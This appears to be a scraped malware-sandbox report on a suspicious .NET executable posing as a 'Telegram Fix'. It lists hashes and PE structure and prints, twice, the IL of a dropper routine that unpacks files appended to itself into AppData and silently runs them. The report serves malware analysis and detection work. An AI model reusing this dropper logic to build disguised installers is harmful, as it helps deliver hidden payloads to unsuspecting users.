Suspicious
Suspect

ce18440a9565e48ff6266831975c7f3f

PE Executable
|
MD5: ce18440a9565e48ff6266831975c7f3f
|
Size: 4.16 MB
|
application/x-dosexec

Print
Summary by MalvaGPT
Characteristics

Symbol Obfuscation Score

Very low

Hash
 Hash Value
MD5
ce18440a9565e48ff6266831975c7f3f
Sha1
1c89214667ee27334c501e74fac2ceba00ac8216
Sha256
d1cf2bed3134dcfa6cc837d263f99ab2743d7b770f801be92b172f441b6e0ae5
Sha384
168c20e255ac556e58fc999ecfd07b317951d023c8ff6ce381fe1665dba8925830d6a9d94046dd24bcf62d387122d440
Sha512
389be4d75cc4377a3bb918b5dbf77aa694770acd5118bd616b0eabf2c447eb4d2e15c9a22675b0f785c40a088e58d4bead52fbf431775c5692f7defc36429b91
SSDeep
98304:RYMrRtXovrojMKLxTerDmPtvcGoN+V8BXHpHjcFrJC6guyr4qG:RY8TPLxTeX+tvcBLXHporJDF
TLSH
89162318B39A30AAD33646F5899D1502CD2EB8537F21D68B13528A863D6F3AD0F37731

PeID

.NET executable
Microsoft Visual C# / Basic.NET / MS Visual Basic 2005 - ASL
Microsoft Visual C++ v6.0 DLL
Microsoft Visual Studio .NET
File Structure
ce18440a9565e48ff6266831975c7f3f
Overlay_6fe74055.bin
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
Informations
Name
 Value
Info

PE Detect: PeReader OK (file layout)
Info

Overlay extracted: Overlay_6fe74055.bin (4152418 bytes)
Module Name

Telegram Fix by Sexsoldier.exe
Full Name

Telegram Fix by Sexsoldier.exe
EntryPoint

System.Void SilentExecuter.Program::Main()
Scope Name

Telegram Fix by Sexsoldier.exe
Scope Type

ModuleDef
Kind

Windows
Runtime Version

v4.0.30319
Tables Header Version

512
WinMD Version

<null>
Assembly Name

Telegram Fix by Sexsoldier
Assembly Version

0.0.0.0
Assembly Culture

<null>
Has PublicKey

False
PublicKey Token

<null>
Target Framework

<null>
Total Strings

1
Main Method

System.Void SilentExecuter.Program::Main()
Main IL Instruction Count

240
Main IL

ldc.i4.s 28 call System.String System.Environment::GetFolderPath(System.Environment/SpecialFolder) ldstr MergedApps_ call System.Guid System.Guid::NewGuid() stloc.s V_25 ldloca.s V_25 constrained. System.Guid callvirt System.String System.Object::ToString() call System.String System.String::Concat(System.String,System.String) call System.String System.IO.Path::Combine(System.String,System.String) stloc.0 <null> ldloc.0 <null> call System.IO.DirectoryInfo System.IO.Directory::CreateDirectory(System.String) pop <null> newobj System.Void System.Collections.Generic.List`1<System.String>::.ctor() stloc.1 <null> call System.Reflection.Assembly System.Reflection.Assembly::GetExecutingAssembly() callvirt System.String System.Reflection.Assembly::get_Location() stloc.2 <null> ldloc.2 <null> ldc.i4.3 <null> ldc.i4.1 <null> newobj System.Void System.IO.FileStream::.ctor(System.String,System.IO.FileMode,System.IO.FileAccess) stloc.3 <null> ldloc.3 <null> callvirt System.Int64 System.IO.Stream::get_Length() stloc.s V_4 ldloc.3 <null> ldc.i4.s -20 conv.i8 <null> ldc.i4.2 <null> callvirt System.Int64 System.IO.Stream::Seek(System.Int64,System.IO.SeekOrigin) pop <null> ldc.i4.s 20 newarr System.Byte stloc.s V_5 ldloc.3 <null> ldloc.s V_5 ldc.i4.0 <null> ldc.i4.s 20 callvirt System.Int32 System.IO.Stream::Read(System.Byte[],System.Int32,System.Int32) pop <null> ldc.i4.4 <null> newarr System.Byte dup <null> ldtoken System.Int32 <PrivateImplementationDetails>{3A104D30-6B0A-41DB-A788-2C9A555ACCD9}::$$method0x6000001-1 call System.Void System.Runtime.CompilerServices.RuntimeHelpers::InitializeArray(System.Array,System.RuntimeFieldHandle) stloc.s V_6 ldc.i4.1 <null> stloc.s V_7 ldc.i4.0 <null> stloc.s V_8 br.s IL_00A9: ldloc.s V_8 ldloc.s V_5 ldc.i4.s 16 ldloc.s V_8 add <null> ldelem.u1 <null> ldloc.s V_6 ldloc.s V_8 ldelem.u1 <null> beq.s IL_00A3: ldloc.s V_8 ldc.i4.0 <null> stloc.s V_7 br.s IL_00AE: ldloc.s V_7 ldloc.s V_8 ldc.i4.1 <null> add <null> stloc.s V_8 ldloc.s V_8 ldc.i4.4 <null> blt.s IL_008F: ldloc.s V_5 ldloc.s V_7 brtrue.s IL_00B7: ldloc.s V_5 leave IL_022F: ret ldloc.s V_5 ldc.i4.0 <null> call System.Int64 System.BitConverter::ToInt64(System.Byte[],System.Int32) stloc.s V_9 ldloc.s V_5 ldc.i4.8 <null> call System.Int32 System.BitConverter::ToInt32(System.Byte[],System.Int32) stloc.s V_10 ldloc.s V_9 ldc.i4.0 <null> conv.i8 <null> ble.s IL_00DB: leave IL_022F ldloc.s V_9 ldloc.s V_4 ldc.i4.s 100 conv.i8 <null> sub <null> blt.s IL_00E0: ldloc.s V_10 leave IL_022F: ret ldloc.s V_10 ldc.i4.0 <null> ble.s IL_00EB: leave IL_022F ldloc.s V_10 ldc.i4.s 100 ble.s IL_00F0: ldloc.3 leave IL_022F: ret ldloc.3 <null> ldloc.s V_9 ldc.i4.0 <null> callvirt System.Int64 System.IO.Stream::Seek(System.Int64,System.IO.SeekOrigin) pop <null> ldloc.3 <null> ldc.i4.4 <null> conv.i8 <null> ldc.i4.1 <null> callvirt System.Int64 System.IO.Stream::Seek(System.Int64,System.IO.SeekOrigin) pop <null> ldc.i4.0 <null> stloc.s V_11 br IL_01E2: ldloc.s V_11 ldc.i4.4 <null> newarr System.Byte stloc.s V_12 ldloc.3 <null> ldloc.s V_12 ldc.i4.0 <null> ldc.i4.4 <null> callvirt System.Int32 System.IO.Stream::Read(System.Byte[],System.Int32,System.Int32) pop <null> ldloc.s V_12 ldc.i4.0 <null> call System.Int32 System.BitConverter::ToInt32(System.Byte[],System.Int32) stloc.s V_13 ldloc.s V_13 newarr System.Byte stloc.s V_14 ldloc.3 <null> ldloc.s V_14 ldc.i4.0 <null> ldloc.s V_13 callvirt System.Int32 System.IO.Stream::Read(System.Byte[],System.Int32,System.Int32) pop <null> call System.Text.Encoding System.Text.Encoding::get_UTF8() ldloc.s V_14 callvirt System.String System.Text.Encoding::GetString(System.Byte[]) stloc.s V_15 ldc.i4.8 <null> newarr System.Byte stloc.s V_16 ldloc.3 <null> ldloc.s V_16 ldc.i4.0 <null> ldc.i4.8 <null> callvirt System.Int32 System.IO.Stream::Read(System.Byte[],System.Int32,System.Int32) pop <null> ldloc.s V_16 ldc.i4.0 <null> call System.Int64 System.BitConverter::ToInt64(System.Byte[],System.Int32) stloc.s V_17 ldloc.0 <null> ldloc.s V_15 call System.String System.IO.Path::Combine(System.String,System.String) stloc.s V_18 ldloc.s V_18 ldc.i4.2 <null> ldc.i4.2 <null> newobj System.Void System.IO.FileStream::.ctor(System.String,System.IO.FileMode,System.IO.FileAccess) stloc.s V_19 ldc.i4 81920 newarr System.Byte stloc.s V_20 ldloc.s V_17 stloc.s V_21 br.s IL_01C0: ldloc.s V_21 ldloc.s V_20 ldlen <null> conv.i4 <null> conv.i8 <null> ldloc.s V_21 call System.Int64 System.Math::Min(System.Int64,System.Int64) conv.i4 <null> stloc.s V_22 ldloc.3 <null> ldloc.s V_20 ldc.i4.0 <null> ldloc.s V_22 callvirt System.Int32 System.IO.Stream::Read(System.Byte[],System.Int32,System.Int32) stloc.s V_23 ldloc.s V_19 ldloc.s V_20 ldc.i4.0 <null> ldloc.s V_23 callvirt System.Void System.IO.Stream::Write(System.Byte[],System.Int32,System.Int32) ldloc.s V_21 ldloc.s V_23 conv.i8 <null> sub <null> stloc.s V_21 ldloc.s V_21 ldc.i4.0 <null> conv.i8 <null> bgt.s IL_0190: ldloc.s V_20 leave.s IL_01D4: ldloc.1 ldloc.s V_19 brfalse.s IL_01D3: endfinally ldloc.s V_19 callvirt System.Void System.IDisposable::Dispose() endfinally <null> ldloc.1 <null> ldloc.s V_18 callvirt System.Void System.Collections.Generic.List`1<System.String>::Add(System.String) ldloc.s V_11 ldc.i4.1 <null> add <null> stloc.s V_11 ldloc.s V_11 ldloc.s V_10 blt IL_010C: ldc.i4.4 leave.s IL_01F7: ldloc.1 ldloc.3 <null> brfalse.s IL_01F6: endfinally ldloc.3 <null> callvirt System.Void System.IDisposable::Dispose() endfinally <null> ldloc.1 <null> callvirt System.Collections.Generic.List`1/Enumerator<System.String> System.Collections.Generic.List`1<System.String>::GetEnumerator() stloc.s V_26 br.s IL_0211: ldloca.s V_26 ldloca.s V_26 call System.String System.Collections.Generic.List`1/Enumerator<System.String>::get_Current() stloc.s V_24 ldloc.s V_24 call System.Void SilentExecuter.Program::RunWithoutWait(System.String) ldloca.s V_26 call System.Boolean System.Collections.Generic.List`1/Enumerator<System.String>::MoveNext() brtrue.s IL_0201: ldloca.s V_26 leave.s IL_022A: leave.s IL_022F ldloca.s V_26 constrained. System.Collections.Generic.List`1/Enumerator<System.String> callvirt System.Void System.IDisposable::Dispose() endfinally <null> leave.s IL_022F: ret pop <null> leave.s IL_022F: ret ret <null>
Module Name

Telegram Fix by Sexsoldier.exe
Full Name

Telegram Fix by Sexsoldier.exe
EntryPoint

System.Void SilentExecuter.Program::Main()
Scope Name

Telegram Fix by Sexsoldier.exe
Scope Type

ModuleDef
Kind

Windows
Runtime Version

v4.0.30319
Tables Header Version

512
WinMD Version

<null>
Assembly Name

Telegram Fix by Sexsoldier
Assembly Version

0.0.0.0
Assembly Culture

<null>
Has PublicKey

False
PublicKey Token

<null>
Target Framework

<null>
Total Strings

1
Main Method

System.Void SilentExecuter.Program::Main()
Main IL Instruction Count

240
Main IL

ldc.i4.s 28 call System.String System.Environment::GetFolderPath(System.Environment/SpecialFolder) ldstr MergedApps_ call System.Guid System.Guid::NewGuid() stloc.s V_25 ldloca.s V_25 constrained. System.Guid callvirt System.String System.Object::ToString() call System.String System.String::Concat(System.String,System.String) call System.String System.IO.Path::Combine(System.String,System.String) stloc.0 <null> ldloc.0 <null> call System.IO.DirectoryInfo System.IO.Directory::CreateDirectory(System.String) pop <null> newobj System.Void System.Collections.Generic.List`1<System.String>::.ctor() stloc.1 <null> call System.Reflection.Assembly System.Reflection.Assembly::GetExecutingAssembly() callvirt System.String System.Reflection.Assembly::get_Location() stloc.2 <null> ldloc.2 <null> ldc.i4.3 <null> ldc.i4.1 <null> newobj System.Void System.IO.FileStream::.ctor(System.String,System.IO.FileMode,System.IO.FileAccess) stloc.3 <null> ldloc.3 <null> callvirt System.Int64 System.IO.Stream::get_Length() stloc.s V_4 ldloc.3 <null> ldc.i4.s -20 conv.i8 <null> ldc.i4.2 <null> callvirt System.Int64 System.IO.Stream::Seek(System.Int64,System.IO.SeekOrigin) pop <null> ldc.i4.s 20 newarr System.Byte stloc.s V_5 ldloc.3 <null> ldloc.s V_5 ldc.i4.0 <null> ldc.i4.s 20 callvirt System.Int32 System.IO.Stream::Read(System.Byte[],System.Int32,System.Int32) pop <null> ldc.i4.4 <null> newarr System.Byte dup <null> ldtoken System.Int32 <PrivateImplementationDetails>{3A104D30-6B0A-41DB-A788-2C9A555ACCD9}::$$method0x6000001-1 call System.Void System.Runtime.CompilerServices.RuntimeHelpers::InitializeArray(System.Array,System.RuntimeFieldHandle) stloc.s V_6 ldc.i4.1 <null> stloc.s V_7 ldc.i4.0 <null> stloc.s V_8 br.s IL_00A9: ldloc.s V_8 ldloc.s V_5 ldc.i4.s 16 ldloc.s V_8 add <null> ldelem.u1 <null> ldloc.s V_6 ldloc.s V_8 ldelem.u1 <null> beq.s IL_00A3: ldloc.s V_8 ldc.i4.0 <null> stloc.s V_7 br.s IL_00AE: ldloc.s V_7 ldloc.s V_8 ldc.i4.1 <null> add <null> stloc.s V_8 ldloc.s V_8 ldc.i4.4 <null> blt.s IL_008F: ldloc.s V_5 ldloc.s V_7 brtrue.s IL_00B7: ldloc.s V_5 leave IL_022F: ret ldloc.s V_5 ldc.i4.0 <null> call System.Int64 System.BitConverter::ToInt64(System.Byte[],System.Int32) stloc.s V_9 ldloc.s V_5 ldc.i4.8 <null> call System.Int32 System.BitConverter::ToInt32(System.Byte[],System.Int32) stloc.s V_10 ldloc.s V_9 ldc.i4.0 <null> conv.i8 <null> ble.s IL_00DB: leave IL_022F ldloc.s V_9 ldloc.s V_4 ldc.i4.s 100 conv.i8 <null> sub <null> blt.s IL_00E0: ldloc.s V_10 leave IL_022F: ret ldloc.s V_10 ldc.i4.0 <null> ble.s IL_00EB: leave IL_022F ldloc.s V_10 ldc.i4.s 100 ble.s IL_00F0: ldloc.3 leave IL_022F: ret ldloc.3 <null> ldloc.s V_9 ldc.i4.0 <null> callvirt System.Int64 System.IO.Stream::Seek(System.Int64,System.IO.SeekOrigin) pop <null> ldloc.3 <null> ldc.i4.4 <null> conv.i8 <null> ldc.i4.1 <null> callvirt System.Int64 System.IO.Stream::Seek(System.Int64,System.IO.SeekOrigin) pop <null> ldc.i4.0 <null> stloc.s V_11 br IL_01E2: ldloc.s V_11 ldc.i4.4 <null> newarr System.Byte stloc.s V_12 ldloc.3 <null> ldloc.s V_12 ldc.i4.0 <null> ldc.i4.4 <null> callvirt System.Int32 System.IO.Stream::Read(System.Byte[],System.Int32,System.Int32) pop <null> ldloc.s V_12 ldc.i4.0 <null> call System.Int32 System.BitConverter::ToInt32(System.Byte[],System.Int32) stloc.s V_13 ldloc.s V_13 newarr System.Byte stloc.s V_14 ldloc.3 <null> ldloc.s V_14 ldc.i4.0 <null> ldloc.s V_13 callvirt System.Int32 System.IO.Stream::Read(System.Byte[],System.Int32,System.Int32) pop <null> call System.Text.Encoding System.Text.Encoding::get_UTF8() ldloc.s V_14 callvirt System.String System.Text.Encoding::GetString(System.Byte[]) stloc.s V_15 ldc.i4.8 <null> newarr System.Byte stloc.s V_16 ldloc.3 <null> ldloc.s V_16 ldc.i4.0 <null> ldc.i4.8 <null> callvirt System.Int32 System.IO.Stream::Read(System.Byte[],System.Int32,System.Int32) pop <null> ldloc.s V_16 ldc.i4.0 <null> call System.Int64 System.BitConverter::ToInt64(System.Byte[],System.Int32) stloc.s V_17 ldloc.0 <null> ldloc.s V_15 call System.String System.IO.Path::Combine(System.String,System.String) stloc.s V_18 ldloc.s V_18 ldc.i4.2 <null> ldc.i4.2 <null> newobj System.Void System.IO.FileStream::.ctor(System.String,System.IO.FileMode,System.IO.FileAccess) stloc.s V_19 ldc.i4 81920 newarr System.Byte stloc.s V_20 ldloc.s V_17 stloc.s V_21 br.s IL_01C0: ldloc.s V_21 ldloc.s V_20 ldlen <null> conv.i4 <null> conv.i8 <null> ldloc.s V_21 call System.Int64 System.Math::Min(System.Int64,System.Int64) conv.i4 <null> stloc.s V_22 ldloc.3 <null> ldloc.s V_20 ldc.i4.0 <null> ldloc.s V_22 callvirt System.Int32 System.IO.Stream::Read(System.Byte[],System.Int32,System.Int32) stloc.s V_23 ldloc.s V_19 ldloc.s V_20 ldc.i4.0 <null> ldloc.s V_23 callvirt System.Void System.IO.Stream::Write(System.Byte[],System.Int32,System.Int32) ldloc.s V_21 ldloc.s V_23 conv.i8 <null> sub <null> stloc.s V_21 ldloc.s V_21 ldc.i4.0 <null> conv.i8 <null> bgt.s IL_0190: ldloc.s V_20 leave.s IL_01D4: ldloc.1 ldloc.s V_19 brfalse.s IL_01D3: endfinally ldloc.s V_19 callvirt System.Void System.IDisposable::Dispose() endfinally <null> ldloc.1 <null> ldloc.s V_18 callvirt System.Void System.Collections.Generic.List`1<System.String>::Add(System.String) ldloc.s V_11 ldc.i4.1 <null> add <null> stloc.s V_11 ldloc.s V_11 ldloc.s V_10 blt IL_010C: ldc.i4.4 leave.s IL_01F7: ldloc.1 ldloc.3 <null> brfalse.s IL_01F6: endfinally ldloc.3 <null> callvirt System.Void System.IDisposable::Dispose() endfinally <null> ldloc.1 <null> callvirt System.Collections.Generic.List`1/Enumerator<System.String> System.Collections.Generic.List`1<System.String>::GetEnumerator() stloc.s V_26 br.s IL_0211: ldloca.s V_26 ldloca.s V_26 call System.String System.Collections.Generic.List`1/Enumerator<System.String>::get_Current() stloc.s V_24 ldloc.s V_24 call System.Void SilentExecuter.Program::RunWithoutWait(System.String) ldloca.s V_26 call System.Boolean System.Collections.Generic.List`1/Enumerator<System.String>::MoveNext() brtrue.s IL_0201: ldloca.s V_26 leave.s IL_022A: leave.s IL_022F ldloca.s V_26 constrained. System.Collections.Generic.List`1/Enumerator<System.String> callvirt System.Void System.IDisposable::Dispose() endfinally <null> leave.s IL_022F: ret pop <null> leave.s IL_022F: ret ret <null>
ce18440a9565e48ff6266831975c7f3f (4.16 MB)
An error has occurred. This application may no longer respond until reloaded. Reload 🗙